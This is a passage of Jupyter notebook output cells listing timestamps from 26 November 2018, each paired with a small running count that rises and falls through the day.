"['2018-11-26 08:59:53.050096', 8]\n",
"['2018-11-26 09:01:59.014658', 9]\n",
"['2018-11-26 09:02:26.390594', 8]\n",
"['2018-11-26 09:02:34.377169', 7]\n",
"['2018-11-26 09:03:33.778571', 6]\n",
"['2018-11-26 09:04:01.582521', 7]\n",
"['2018-11-26 09:05:27.640869', 8]\n",
"['2018-11-26 09:05:35.868231', 7]\n",
"['2018-11-26 09:06:20.607252', 8]\n",
"['2018-11-26 09:06:45.471831', 9]\n",
"['2018-11-26 09:06:57.673918', 10]\n",
"['2018-11-26 09:07:05.072386', 7]\n",
"['2018-11-26 09:07:05.516171', 8]\n",
"['2018-11-26 09:07:09.981069', 9]\n",
"['2018-11-26 09:07:15.139320', 10]\n",
"['2018-11-26 09:08:31.757711', 11]\n",
"['2018-11-26 09:09:15.365937', 10]\n",
"['2018-11-26 09:09:42.245151', 11]\n",
"['2018-11-26 09:09:59.378573', 9]\n",
"['2018-11-26 09:11:00.153777', 7]\n",
"['2018-11-26 09:11:42.239508', 4]\n",
"['2018-11-26 09:13:36.736744', 5]\n",
"['2018-11-26 09:13:41.271604', 6]\n",
"['2018-11-26 09:13:45.037462', 7]\n",
"['2018-11-26 09:18:00.156029', 3]\n",
"['2018-11-26 09:20:08.162642', 1]\n",
"['2018-11-26 09:20:41.283587', 2]\n",
"['2018-11-26 09:28:37.244035', 1]\n",
"['2018-11-26 09:43:17.281394', 2]\n",
"['2018-11-26 09:44:38.670465', 1]\n",
"['2018-11-26 09:45:28.838418', 2]\n",
"['2018-11-26 09:51:13.035330', 3]\n",
"['2018-11-26 09:55:08.056008', 4]\n",
"['2018-11-26 09:55:23.444697', 3]\n",
"['2018-11-26 09:57:34.026852', 4]\n",
"['2018-11-26 09:58:09.657100', 5]\n",
"['2018-11-26 09:58:21.970578', 6]\n",
"['2018-11-26 09:58:43.544009', 7]\n",
"['2018-11-26 09:59:34.033266', 8]\n",
"['2018-11-26 10:00:10.509358', 9]\n",
"['2018-11-26 10:00:12.987522', 10]\n",
"['2018-11-26 10:00:37.978763', 11]\n",
"['2018-11-26 10:01:24.563376', 12]\n",
"['2018-11-26 10:02:20.994119', 11]\n",
"['2018-11-26 10:03:21.215156', 9]\n",
"['2018-11-26 10:03:56.266494', 10]\n",
"['2018-11-26 10:04:13.395791', 8]\n",
"['2018-11-26 10:04:21.862242', 7]\n",
"['2018-11-26 10:04:45.349068', 6]\n",
"['2018-11-26 10:05:47.357391', 5]\n",
"['2018-11-26 10:06:18.365140', 4]\n",
"['2018-11-26 10:07:11.671495', 5]\n",
"['2018-11-26 10:07:11.754540', 6]\n",
"['2018-11-26 10:07:27.170170', 7]\n",
"['2018-11-26 10:07:39.481723', 6]\n",
"['2018-11-26 10:09:17.605531', 5]\n",
"['2018-11-26 10:09:36.643607', 6]\n",
"['2018-11-26 10:11:30.481211', 4]\n",
"['2018-11-26 10:13:33.380254', 3]\n",
"['2018-11-26 10:15:00.347689', 1]\n",
"['2018-11-26 10:27:51.879942', 2]\n",
"['2018-11-26 10:29:17.615466', 3]\n",
"['2018-11-26 10:33:11.780816', 2]\n",
"['2018-11-26 10:34:57.608597', 1]\n",
"['2018-11-26 10:35:47.920351', 2]\n",
"['2018-11-26 10:40:23.479807', 1]\n",
"['2018-11-26 10:40:25.777030', 2]\n",
"['2018-11-26 10:44:22.442925', 3]\n",
"['2018-11-26 10:45:54.262862', 2]\n",
"['2018-11-26 10:46:46.444943', 1]\n",
"['2018-11-26 10:47:18.168849', 2]\n",
"['2018-11-26 10:50:19.738955', 3]\n",
"['2018-11-26 10:52:36.950490', 4]\n",
"['2018-11-26 10:53:39.055619', 5]\n",
"['2018-11-26 10:58:18.366772', 6]\n",
"['2018-11-26 10:59:49.853454', 7]\n",
"['2018-11-26 11:00:15.686262', 8]\n",
"['2018-11-26 11:00:20.586423', 9]\n",
"['2018-11-26 11:01:01.911726', 10]\n",
"['2018-11-26 11:01:06.492904', 11]\n",
"['2018-11-26 11:01:36.567525', 12]\n",
"['2018-11-26 11:01:38.523653', 13]\n",
"['2018-11-26 11:01:48.208770', 12]\n",
"['2018-11-26 11:01:51.647740', 13]\n",
"['2018-11-26 11:02:02.130454', 12]\n",
"['2018-11-26 11:03:12.026779', 13]\n",
"['2018-11-26 11:03:30.076112', 14]\n",
"['2018-11-26 11:03:51.651624', 12]\n",
"['2018-11-26 11:05:19.819080', 10]\n",
"['2018-11-26 11:05:44.362448', 9]\n",
"['2018-11-26 11:05:44.902928', 10]\n",
"['2018-11-26 11:05:53.043061', 11]\n",
"['2018-11-26 11:06:13.166105', 10]\n",
"['2018-11-26 11:06:14.519716', 11]\n",
"['2018-11-26 11:06:35.865415', 12]\n",
"['2018-11-26 11:07:29.210751', 13]\n",
"['2018-11-26 11:07:32.154031', 11]\n",
"['2018-11-26 11:07:37.210603', 12]\n",
"['2018-11-26 11:07:58.684001', 11]\n",
"['2018-11-26 11:08:06.257168', 10]\n",
"['2018-11-26 11:08:13.601488', 11]\n",
"['2018-11-26 11:08:32.516210', 10]\n",
"['2018-11-26 11:08:43.883831', 11]\n",
"['2018-11-26 11:09:07.884552', 12]\n",
"['2018-11-26 11:09:25.271912', 13]\n",
"['2018-11-26 11:09:31.886013', 14]\n",
"['2018-11-26 11:09:50.138254', 15]\n",
"['2018-11-26 11:10:20.860516', 14]\n",
"['2018-11-26 11:11:15.979924', 13]\n",
"['2018-11-26 11:12:07.292775', 14]\n",
"['2018-11-26 11:12:34.793082', 15]\n",
"['2018-11-26 11:12:37.582550', 16]\n",
"['2018-11-26 11:12:58.702053', 15]\n",
"['2018-11-26 11:13:02.179007', 16]\n",
"['2018-11-26 11:13:03.895861', 17]\n",
"['2018-11-26 11:13:14.177682', 18]\n",
"['2018-11-26 11:13:18.708249', 17]\n",
"['2018-11-26 11:13:38.656273', 18]\n",
"['2018-11-26 11:13:54.570931', 17]\n",
"['2018-11-26 11:13:59.507259', 16]\n",
"['2018-11-26 11:14:08.523871', 17]\n",
"['2018-11-26 11:14:43.240325', 18]\n",
"['2018-11-26 11:14:55.984175', 17]\n",
"['2018-11-26 11:15:20.842886', 16]\n",
"['2018-11-26 11:15:36.600648', 17]\n",
"['2018-11-26 11:16:03.791153', 16]\n",
"['2018-11-26 11:16:17.644475', 15]\n",
"['2018-11-26 11:16:34.877008', 14]\n",
"['2018-11-26 11:16:38.418252', 13]\n",
"['2018-11-26 11:16:46.443147', 12]\n",
"['2018-11-26 11:18:09.561004', 9]\n",
"['2018-11-26 11:19:30.596498', 7]\n",
"['2018-11-26 11:19:42.089891', 8]\n",
"['2018-11-26 11:20:11.482648', 6]\n",
"['2018-11-26 11:20:29.152281', 5]\n",
"['2018-11-26 11:20:52.289930', 6]\n",
"['2018-11-26 11:21:30.866182', 5]\n",
"['2018-11-26 11:22:06.967111', 6]\n",
"['2018-11-26 11:24:12.346726', 4]\n",
"['2018-11-26 11:25:39.132905', 3]\n",
"['2018-11-26 11:26:13.433425', 2]\n",
"['2018-11-26 11:27:55.237230', 3]\n",
"['2018-11-26 11:45:39.652722', 1]\n",
"['2018-11-26 11:49:28.050332', 2]\n",
"['2018-11-26 11:49:47.467816', 3]\n",
"['2018-11-26 11:51:05.004001', 4]\n",
"['2018-11-26 11:51:14.539823', 5]\n",
"['2018-11-26 11:52:42.050168', 6]\n",
"['2018-11-26 11:53:05.237872', 7]\n",
"['2018-11-26 11:54:34.210328', 8]\n",
"['2018-11-26 11:56:11.157975', 6]\n",
"['2018-11-26 11:56:34.701590', 7]\n",
"['2018-11-26 11:57:16.371632', 8]\n",
"['2018-11-26 11:57:51.613296', 9]\n",
"['2018-11-26 11:58:20.642099', 10]\n",
"['2018-11-26 11:58:45.405692', 11]\n",
"['2018-11-26 11:59:10.700214', 10]\n",
"['2018-11-26 11:59:50.124326', 11]\n",
"['2018-11-26 12:00:27.828697', 12]\n",
"['2018-11-26 12:00:29.540733', 13]\n",
"['2018-11-26 12:00:33.537386', 14]\n",
"['2018-11-26 12:00:34.122700', 15]\n",
"['2018-11-26 12:00:37.098320', 14]\n",
"['2018-11-26 12:00:46.576694', 15]\n",
"['2018-11-26 12:00:51.077067', 16]\n",
"['2018-11-26 12:00:55.617578', 17]\n",
"['2018-11-26 12:00:56.219921', 18]\n",
"['2018-11-26 12:01:17.828873', 19]\n",
"['2018-11-26 12:01:27.938361', 20]\n",
"['2018-11-26 12:02:29.011204', 19]\n",
"['2018-11-26 12:02:34.831433', 20]\n",
"['2018-11-26 12:03:46.997615', 19]\n",
"['2018-11-26 12:04:05.203526', 20]\n",
"['2018-11-26 12:04:16.444414', 21]\n",
"['2018-11-26 12:04:37.136870', 18]\n",
"['2018-11-26 12:04:56.415884', 17]\n",
"['2018-11-26 12:05:57.045573', 8]\n",
"['2018-11-26 12:06:08.064910', 9]\n",
"['2018-11-26 12:06:11.429560', 10]\n",
"['2018-11-26 12:06:12.122405', 11]\n",
"['2018-11-26 12:06:14.654470', 12]\n",
"['2018-11-26 12:07:36.113899', 11]\n",
"['2018-11-26 12:07:50.762142', 12]\n",
"['2018-11-26 12:08:01.490761', 11]\n",
"['2018-11-26 12:08:20.354845', 10]\n",
"['2018-11-26 12:08:50.432112', 11]\n",
"['2018-11-26 12:09:18.278398', 12]\n",
"['2018-11-26 12:09:30.103354', 13]\n",
"['2018-11-26 12:10:19.128504', 9]\n",
"['2018-11-26 12:10:59.595186', 10]\n",
"['2018-11-26 12:10:59.884096', 11]\n",
"['2018-11-26 12:11:06.637360', 12]\n",
"['2018-11-26 12:11:28.862909', 13]\n",
"['2018-11-26 12:11:55.783248', 12]\n",
"['2018-11-26 12:13:16.998365', 11]\n",
"['2018-11-26 12:13:24.414371', 12]\n",
"['2018-11-26 12:13:50.987166', 13]\n",
"['2018-11-26 12:15:03.519666', 11]\n",
"['2018-11-26 12:15:21.304591', 12]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-26 12:15:29.144760', 11]\n",
"['2018-11-26 12:15:39.069112', 10]\n",
"['2018-11-26 12:17:29.271198', 9]\n",
"['2018-11-26 12:17:39.270497', 8]\n",
"['2018-11-26 12:19:39.394761', 7]\n",
"['2018-11-26 12:20:16.293399', 8]\n",
"['2018-11-26 12:21:49.654347', 7]\n",
"['2018-11-26 12:23:34.220571', 6]\n",
"['2018-11-26 12:24:02.643007', 5]\n",
"['2018-11-26 12:24:59.517873', 4]\n",
"['2018-11-26 12:25:12.612019', 3]\n",
"['2018-11-26 12:25:27.249573', 4]\n",
"['2018-11-26 12:27:16.206126', 3]\n",
"['2018-11-26 12:28:53.307099', 4]\n",
"['2018-11-26 12:29:26.428273', 3]\n",
"['2018-11-26 12:29:29.905512', 2]\n",
"['2018-11-26 12:29:38.730789', 3]\n",
"['2018-11-26 12:29:45.458405', 4]\n",
"['2018-11-26 12:34:01.698630', 2]\n",
"['2018-11-26 12:39:10.775083', 1]\n",
"['2018-11-26 12:41:54.054678', 2]\n",
"['2018-11-26 12:49:53.742778', 3]\n",
"['2018-11-26 12:50:44.312570', 4]\n",
"['2018-11-26 12:52:59.038585', 3]\n",
"['2018-11-26 12:53:21.233261', 4]\n",
"['2018-11-26 12:55:08.650439', 5]\n",
"['2018-11-26 12:55:18.068073', 6]\n",
"['2018-11-26 12:55:45.248515', 7]\n",
"['2018-11-26 12:56:13.004509', 8]\n",
"['2018-11-26 12:56:38.379555', 9]\n",
"['2018-11-26 12:56:56.655465', 10]\n",
"['2018-11-26 12:56:59.089719', 9]\n",
"['2018-11-26 12:56:59.647279', 10]\n",
"['2018-11-26 12:57:49.315220', 9]\n",
"['2018-11-26 12:58:10.866436', 8]\n",
"['2018-11-26 12:58:14.994215', 9]\n",
"['2018-11-26 12:58:19.959066', 10]\n",
"['2018-11-26 12:58:24.243135', 11]\n",
"['2018-11-26 12:59:48.142940', 10]\n",
"['2018-11-26 13:01:02.663250', 9]\n",
"['2018-11-26 13:01:21.155877', 8]\n",
"['2018-11-26 13:01:31.155915', 7]\n",
"['2018-11-26 13:01:40.534631', 8]\n",
"['2018-11-26 13:01:46.660345', 9]\n",
"['2018-11-26 13:01:51.166295', 8]\n",
"['2018-11-26 13:02:01.176617', 7]\n",
"['2018-11-26 13:02:07.908658', 8]\n",
"['2018-11-26 13:02:57.616660', 6]\n",
"['2018-11-26 13:02:58.749288', 7]\n",
"['2018-11-26 13:03:28.599120', 8]\n",
"['2018-11-26 13:03:52.144484', 9]\n",
"['2018-11-26 13:04:30.032166', 10]\n",
"['2018-11-26 13:04:59.643399', 11]\n",
"['2018-11-26 13:05:18.909699', 10]\n",
"['2018-11-26 13:05:28.307537', 11]\n",
"['2018-11-26 13:06:27.870336', 8]\n",
"['2018-11-26 13:06:51.419406', 9]\n",
"['2018-11-26 13:07:15.312113', 7]\n",
"['2018-11-26 13:07:36.834245', 8]\n",
"['2018-11-26 13:07:43.479888', 9]\n",
"['2018-11-26 13:08:05.590308', 8]\n",
"['2018-11-26 13:08:25.833277', 9]\n",
"['2018-11-26 13:08:43.128122', 10]\n",
"['2018-11-26 13:08:48.972371', 11]\n",
"['2018-11-26 13:08:53.581064', 12]\n",
"['2018-11-26 13:08:55.892616', 13]\n",
"['2018-11-26 13:08:57.626457', 14]\n",
"['2018-11-26 13:09:33.259279', 13]\n",
"['2018-11-26 13:09:38.570612', 12]\n",
"['2018-11-26 13:09:43.200935', 13]\n",
"['2018-11-26 13:10:55.702116', 12]\n",
"['2018-11-26 13:11:35.747746', 11]\n",
"['2018-11-26 13:11:53.558118', 10]\n",
"['2018-11-26 13:13:42.929362', 11]\n",
"['2018-11-26 13:13:45.834626', 10]\n",
"['2018-11-26 13:13:55.843646', 8]\n",
"['2018-11-26 13:14:00.569483', 7]\n",
"['2018-11-26 13:14:23.808890', 8]\n",
"['2018-11-26 13:14:41.070409', 9]\n",
"['2018-11-26 13:15:18.793210', 10]\n",
"['2018-11-26 13:15:20.153024', 11]\n",
"['2018-11-26 13:15:27.846111', 12]\n",
"['2018-11-26 13:16:27.096451', 13]\n",
"['2018-11-26 13:17:05.978278', 12]\n",
"['2018-11-26 13:17:16.653089', 11]\n",
"['2018-11-26 13:17:17.736000', 10]\n",
"['2018-11-26 13:17:36.009108', 9]\n",
"['2018-11-26 13:17:46.019015', 8]\n",
"['2018-11-26 13:18:10.771987', 9]\n",
"['2018-11-26 13:18:19.560688', 10]\n",
"['2018-11-26 13:18:23.075582', 11]\n",
"['2018-11-26 13:18:27.720385', 12]\n",
"['2018-11-26 13:18:36.626556', 13]\n",
"['2018-11-26 13:19:41.953037', 14]\n",
"['2018-11-26 13:21:03.013757', 13]\n",
"['2018-11-26 13:22:44.828687', 9]\n",
"['2018-11-26 13:23:03.860373', 8]\n",
"['2018-11-26 13:23:22.014011', 7]\n",
"['2018-11-26 13:25:42.079596', 3]\n",
"['2018-11-26 13:25:44.681821', 4]\n",
"['2018-11-26 13:27:07.041518', 5]\n",
"['2018-11-26 13:27:11.446570', 6]\n",
"['2018-11-26 13:27:25.066770', 5]\n",
"['2018-11-26 13:28:09.190760', 6]\n",
"['2018-11-26 13:30:03.580856', 7]\n",
"['2018-11-26 13:33:00.246677', 6]\n",
"['2018-11-26 13:34:30.857353', 5]\n",
"['2018-11-26 13:35:16.190170', 3]\n",
"['2018-11-26 13:36:46.855833', 2]\n",
"['2018-11-26 13:37:32.188639', 1]\n",
"['2018-11-26 13:37:41.038556', 2]\n",
"['2018-11-26 13:38:17.272620', 3]\n",
"['2018-11-26 13:38:23.547101', 4]\n",
"['2018-11-26 13:40:33.677097', 5]\n",
"['2018-11-26 13:40:57.232066', 6]\n",
"['2018-11-26 13:43:05.020709', 7]\n",
"['2018-11-26 13:44:48.341371', 6]\n",
"['2018-11-26 13:46:15.899512', 7]\n",
"['2018-11-26 13:47:17.044976', 8]\n",
"['2018-11-26 13:47:22.050330', 9]\n",
"['2018-11-26 13:50:02.025647', 10]\n",
"['2018-11-26 13:50:17.609537', 11]\n",
"['2018-11-26 13:50:56.276796', 12]\n",
"['2018-11-26 13:52:50.527094', 13]\n",
"['2018-11-26 13:53:11.375395', 14]\n",
"['2018-11-26 13:53:11.396279', 15]\n",
"['2018-11-26 13:53:23.782439', 14]\n",
"['2018-11-26 13:53:43.041888', 15]\n",
"['2018-11-26 13:53:50.542881', 16]\n",
"['2018-11-26 13:53:52.403211', 17]\n",
"['2018-11-26 13:54:19.108588', 16]\n",
"['2018-11-26 13:54:59.059526', 17]\n",
"['2018-11-26 13:55:10.832737', 16]\n",
"['2018-11-26 13:55:14.976658', 15]\n",
"['2018-11-26 13:55:23.004877', 16]\n",
"['2018-11-26 13:55:24.667720', 17]\n",
"['2018-11-26 13:55:30.294838', 18]\n",
"['2018-11-26 13:55:31.284889', 19]\n",
"['2018-11-26 13:55:36.285520', 20]\n",
"['2018-11-26 13:55:57.603779', 21]\n",
"['2018-11-26 13:56:11.573552', 20]\n",
"['2018-11-26 13:57:04.758981', 19]\n",
"['2018-11-26 13:57:09.903305', 20]\n",
"['2018-11-26 13:57:26.409987', 21]\n",
"['2018-11-26 13:57:43.065762', 20]\n",
"['2018-11-26 13:57:53.989901', 19]\n",
"['2018-11-26 13:58:23.440580', 20]\n",
"['2018-11-26 13:59:20.437298', 21]\n",
"['2018-11-26 13:59:25.699513', 19]\n",
"['2018-11-26 13:59:27.354537', 20]\n",
"['2018-11-26 13:59:29.145894', 19]\n",
"['2018-11-26 13:59:40.335446', 17]\n",
"['2018-11-26 14:01:25.799571', 14]\n",
"['2018-11-26 14:02:26.312369', 13]\n",
"['2018-11-26 14:02:32.484117', 11]\n",
"['2018-11-26 14:02:53.737089', 10]\n",
"['2018-11-26 14:03:13.049472', 9]\n",
"['2018-11-26 14:03:57.345920', 8]\n",
"['2018-11-26 14:04:56.952897', 9]\n",
"['2018-11-26 14:06:00.226685', 7]\n",
"['2018-11-26 14:07:05.632494', 8]\n",
"['2018-11-26 14:07:56.940761', 7]\n",
"['2018-11-26 14:08:41.937867', 6]\n",
"['2018-11-26 14:10:28.246256', 7]\n",
"['2018-11-26 14:11:04.526793', 5]\n",
"['2018-11-26 14:12:05.437147', 4]\n",
"['2018-11-26 14:13:06.476958', 2]\n",
"['2018-11-26 14:16:35.665579', 3]\n",
"['2018-11-26 14:21:01.421502', 2]\n",
"['2018-11-26 14:21:24.287376', 3]\n",
"['2018-11-26 14:25:52.574082', 2]\n",
"['2018-11-26 14:31:20.762057', 3]\n",
"['2018-11-26 14:33:57.138860', 4]\n",
"['2018-11-26 14:35:40.353880', 3]\n",
"['2018-11-26 14:36:19.076594', 4]\n",
"['2018-11-26 14:38:13.093607', 3]\n",
"['2018-11-26 14:40:00.152006', 4]\n",
"['2018-11-26 14:41:46.777591', 3]\n",
"['2018-11-26 14:41:49.004522', 4]\n",
"['2018-11-26 14:42:21.106162', 5]\n",
"['2018-11-26 14:45:33.284924', 6]\n",
"['2018-11-26 14:45:51.397560', 5]\n",
"['2018-11-26 14:46:41.779043', 4]\n",
"['2018-11-26 14:46:54.475490', 5]\n",
"['2018-11-26 14:47:22.133482', 6]\n",
"['2018-11-26 14:49:46.512014', 7]\n",
"['2018-11-26 14:50:20.768264', 8]\n",
"['2018-11-26 14:51:12.542278', 7]\n",
"['2018-11-26 14:52:23.173456', 6]\n",
"['2018-11-26 14:52:24.126236', 7]\n",
"['2018-11-26 14:52:26.108921', 8]\n",
"['2018-11-26 14:52:39.053833', 7]\n",
"['2018-11-26 14:52:52.710916', 8]\n",
"['2018-11-26 14:52:56.170685', 9]\n",
"['2018-11-26 14:54:38.062657', 8]\n",
"['2018-11-26 14:54:53.787829', 6]\n",
"['2018-11-26 14:54:54.198621', 7]\n",
"['2018-11-26 14:55:19.903858', 8]\n",
"['2018-11-26 14:56:20.786234', 9]\n",
"['2018-11-26 14:56:21.947480', 10]\n",
"['2018-11-26 14:56:56.321481', 9]\n",
"['2018-11-26 14:57:26.344312', 8]\n",
"['2018-11-26 14:58:25.625883', 9]\n",
"['2018-11-26 14:59:00.627904', 8]\n",
"['2018-11-26 14:59:03.135518', 9]\n",
"['2018-11-26 15:00:16.498342', 8]\n",
"['2018-11-26 15:00:21.564344', 7]\n",
"['2018-11-26 15:00:23.656312', 6]\n",
"['2018-11-26 15:00:29.506634', 5]\n",
"['2018-11-26 15:01:24.123272', 6]\n",
"['2018-11-26 15:01:54.804104', 7]\n",
"['2018-11-26 15:04:17.368244', 5]\n",
"['2018-11-26 15:05:26.750819', 4]\n",
"['2018-11-26 15:06:06.792279', 2]\n",
"['2018-11-26 15:19:16.567125', 1]\n",
"['2018-11-26 15:19:23.502743', 2]\n",
"['2018-11-26 15:36:03.036309', 1]\n",
"['2018-11-26 15:36:54.345654', 2]\n",
"['2018-11-26 15:42:29.502750', 3]\n",
"['2018-11-26 15:43:08.147245', 4]\n",
"['2018-11-26 15:47:07.883621', 5]\n",
"['2018-11-26 15:51:41.686499', 6]\n",
"['2018-11-26 15:52:35.834695', 7]\n",
"['2018-11-26 15:52:38.722938', 8]\n",
"['2018-11-26 15:53:25.116370', 9]\n",
"['2018-11-26 15:53:48.563326', 10]\n",
"['2018-11-26 15:53:57.255853', 11]\n",
"['2018-11-26 15:54:04.284745', 12]\n",
"['2018-11-26 15:54:33.079500', 11]\n",
"['2018-11-26 15:55:06.961151', 12]\n",
"['2018-11-26 15:55:45.712544', 11]\n",
"['2018-11-26 15:56:37.505036', 10]\n",
"['2018-11-26 15:57:30.677524', 11]\n",
"['2018-11-26 15:58:03.504671', 10]\n",
"['2018-11-26 15:58:33.382373', 11]\n",
"['2018-11-26 15:58:34.836461', 10]\n",
"['2018-11-26 15:58:52.788942', 9]\n",
"['2018-11-26 15:59:07.582624', 8]\n",
"['2018-11-26 15:59:57.888755', 9]\n",
"['2018-11-26 16:00:01.134266', 10]\n",
"['2018-11-26 16:00:07.122559', 11]\n",
"['2018-11-26 16:00:24.128252', 12]\n",
"['2018-11-26 16:00:27.878243', 13]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-26 16:00:32.586298', 14]\n",
"['2018-11-26 16:00:34.246802', 13]\n",
"['2018-11-26 16:00:40.654788', 12]\n",
"['2018-11-26 16:00:41.408267', 13]\n",
"['2018-11-26 16:00:58.297598', 14]\n",
"['2018-11-26 16:01:41.503736', 13]\n",
"['2018-11-26 16:01:47.036706', 14]\n",
"['2018-11-26 16:02:07.831331', 15]\n",
"['2018-11-26 16:02:40.515343', 16]\n",
"['2018-11-26 16:03:15.285110', 15]\n",
"['2018-11-26 16:03:17.733844', 16]\n",
"['2018-11-26 16:03:37.770085', 15]\n",
"['2018-11-26 16:03:58.304200', 14]\n",
"['2018-11-26 16:04:05.594700', 13]\n",
"['2018-11-26 16:04:17.089116', 12]\n",
"['2018-11-26 16:04:58.303106', 9]\n",
"['2018-11-26 16:06:27.494524', 10]\n",
"['2018-11-26 16:07:05.219638', 8]\n",
"['2018-11-26 16:07:24.036252', 7]\n",
"['2018-11-26 16:08:16.548292', 8]\n",
"['2018-11-26 16:09:04.200328', 9]\n",
"['2018-11-26 16:09:08.757684', 10]\n",
"['2018-11-26 16:09:25.910733', 11]\n",
"['2018-11-26 16:09:53.447826', 10]\n",
"['2018-11-26 16:10:00.382839', 11]\n",
"['2018-11-26 16:10:31.604311', 12]\n",
"['2018-11-26 16:12:48.249093', 11]\n",
"['2018-11-26 16:13:07.828945', 10]\n",
"['2018-11-26 16:13:49.559096', 8]\n",
"['2018-11-26 16:14:00.894203', 7]\n",
"['2018-11-26 16:14:01.847198', 8]\n",
"['2018-11-26 16:14:08.868716', 7]\n",
"['2018-11-26 16:14:25.652691', 6]\n",
"['2018-11-26 16:14:43.912848', 5]\n",
"['2018-11-26 16:16:05.419674', 6]\n",
"['2018-11-26 16:18:24.225368', 5]\n",
"['2018-11-26 16:18:37.139351', 6]\n",
"['2018-11-26 16:19:18.375476', 7]\n",
"['2018-11-26 16:20:08.685577', 6]\n",
"['2018-11-26 16:20:39.778816', 5]\n",
"['2018-11-26 16:24:12.157780', 4]\n",
"['2018-11-26 16:27:57.495888', 5]\n",
"['2018-11-26 16:29:22.661158', 4]\n",
"['2018-11-26 16:30:35.550558', 5]\n",
"['2018-11-26 16:30:47.718913', 4]\n",
"['2018-11-26 16:40:26.445803', 1]\n",
"['2018-11-26 16:42:03.442460', 2]\n",
"['2018-11-26 16:48:47.901941', 3]\n",
"['2018-11-26 16:49:58.944754', 4]\n",
"['2018-11-26 16:54:59.531497', 5]\n",
"['2018-11-26 16:57:15.927984', 6]\n",
"['2018-11-26 16:57:52.488521', 5]\n",
"['2018-11-26 16:58:06.780750', 6]\n",
"['2018-11-26 16:58:13.211950', 7]\n",
"['2018-11-26 16:58:13.498243', 8]\n",
"['2018-11-26 16:58:18.431692', 9]\n",
"['2018-11-26 16:59:00.022707', 8]\n",
"['2018-11-26 16:59:08.022127', 9]\n",
"['2018-11-26 16:59:17.203616', 10]\n",
"['2018-11-26 16:59:28.495834', 11]\n",
"['2018-11-26 16:59:30.485016', 12]\n",
"['2018-11-26 16:59:40.988254', 13]\n",
"['2018-11-26 16:59:56.937562', 14]\n",
"['2018-11-26 17:00:00.018869', 15]\n",
"['2018-11-26 17:00:41.455267', 16]\n",
"['2018-11-26 17:01:08.495224', 15]\n",
"['2018-11-26 17:02:08.536295', 14]\n",
"['2018-11-26 17:02:09.830105', 15]\n",
"['2018-11-26 17:02:23.547516', 16]\n",
"['2018-11-26 17:02:39.602904', 15]\n",
"['2018-11-26 17:03:33.310818', 13]\n",
"['2018-11-26 17:03:42.618225', 14]\n",
"['2018-11-26 17:04:04.912515', 13]\n",
"['2018-11-26 17:04:41.692216', 12]\n",
"['2018-11-26 17:04:46.213522', 10]\n",
"['2018-11-26 17:04:46.258007', 11]\n",
"['2018-11-26 17:06:13.938987', 10]\n",
"['2018-11-26 17:06:31.119573', 11]\n",
"['2018-11-26 17:06:41.398407', 12]\n",
"['2018-11-26 17:07:32.719215', 13]\n",
"['2018-11-26 17:07:50.933944', 12]\n",
"['2018-11-26 17:08:50.916344', 11]\n",
"['2018-11-26 17:10:15.920733', 9]\n",
"['2018-11-26 17:11:13.119804', 7]\n",
"['2018-11-26 17:11:57.651672', 6]\n",
"['2018-11-26 17:12:12.406664', 5]\n",
"['2018-11-26 17:12:39.636695', 4]\n",
"['2018-11-26 17:12:57.444370', 5]\n",
"['2018-11-26 17:13:06.754543', 6]\n",
"['2018-11-26 17:13:14.999598', 7]\n",
"['2018-11-26 17:13:22.935542', 8]\n",
"['2018-11-26 17:13:53.571789', 7]\n",
"['2018-11-26 17:14:09.374983', 6]\n",
"['2018-11-26 17:14:34.470999', 7]\n",
"['2018-11-26 17:14:41.552283', 8]\n",
"['2018-11-26 17:15:06.655755', 9]\n",
"['2018-11-26 17:16:57.621602', 8]\n",
"['2018-11-26 17:17:08.114188', 7]\n",
"['2018-11-26 17:17:34.757907', 8]\n",
"['2018-11-26 17:17:49.912753', 7]\n",
"['2018-11-26 17:18:19.507567', 8]\n",
"['2018-11-26 17:18:29.337409', 9]\n",
"['2018-11-26 17:19:19.578695', 10]\n",
"['2018-11-26 17:22:18.304052', 5]\n",
"['2018-11-26 17:23:49.651941', 2]\n",
"['2018-11-26 17:28:49.588609', 3]\n",
"['2018-11-26 17:35:50.997339', 1]\n",
"['2018-11-26 17:39:07.446273', 2]\n",
"['2018-11-26 17:40:02.651883', 3]\n",
"['2018-11-26 17:40:19.699399', 4]\n",
"['2018-11-26 17:40:28.278682', 3]\n",
"['2018-11-26 17:40:35.433526', 4]\n",
"['2018-11-26 17:42:28.649766', 5]\n",
"['2018-11-26 17:44:10.317259', 4]\n",
"['2018-11-26 17:45:33.734095', 5]\n",
"['2018-11-26 17:45:47.124891', 6]\n",
"['2018-11-26 17:46:27.706233', 7]\n",
"['2018-11-26 17:46:30.193987', 6]\n",
"['2018-11-26 17:47:22.452563', 5]\n",
"['2018-11-26 17:48:45.063840', 6]\n",
"['2018-11-26 17:49:30.886193', 7]\n",
"['2018-11-26 17:51:29.826930', 8]\n",
"['2018-11-26 17:51:51.447832', 9]\n",
"['2018-11-26 17:52:57.167304', 10]\n",
"['2018-11-26 17:54:55.913193', 11]\n",
"['2018-11-26 17:55:22.140838', 12]\n",
"['2018-11-26 17:56:06.650561', 13]\n",
"['2018-11-26 17:56:17.427700', 14]\n",
"['2018-11-26 17:56:46.213254', 15]\n",
"['2018-11-26 17:57:05.059725', 14]\n",
"['2018-11-26 17:57:14.231065', 15]\n",
"['2018-11-26 17:58:51.141065', 14]\n",
"['2018-11-26 17:59:02.785519', 13]\n",
"['2018-11-26 17:59:15.126939', 12]\n",
"['2018-11-26 18:00:00.147366', 13]\n",
"['2018-11-26 18:00:19.211082', 12]\n",
"['2018-11-26 18:00:28.049954', 11]\n",
"['2018-11-26 18:00:33.916684', 12]\n",
"['2018-11-26 18:00:47.612453', 10]\n",
"['2018-11-26 18:01:20.158215', 8]\n",
"['2018-11-26 18:02:01.367023', 9]\n",
"['2018-11-26 18:03:05.338809', 8]\n",
"['2018-11-26 18:03:31.125564', 9]\n",
"['2018-11-26 18:03:40.031733', 10]\n",
"['2018-11-26 18:03:47.078879', 9]\n",
"['2018-11-26 18:04:08.686099', 8]\n",
"['2018-11-26 18:04:22.722725', 9]\n",
"['2018-11-26 18:04:30.962230', 8]\n",
"['2018-11-26 18:04:49.543915', 7]\n",
"['2018-11-26 18:06:10.951989', 6]\n",
"['2018-11-26 18:06:34.956877', 5]\n",
"['2018-11-26 18:07:23.828994', 6]\n",
"['2018-11-26 18:07:33.600887', 5]\n",
"['2018-11-26 18:07:50.395303', 4]\n",
"['2018-11-26 18:09:53.194624', 5]\n",
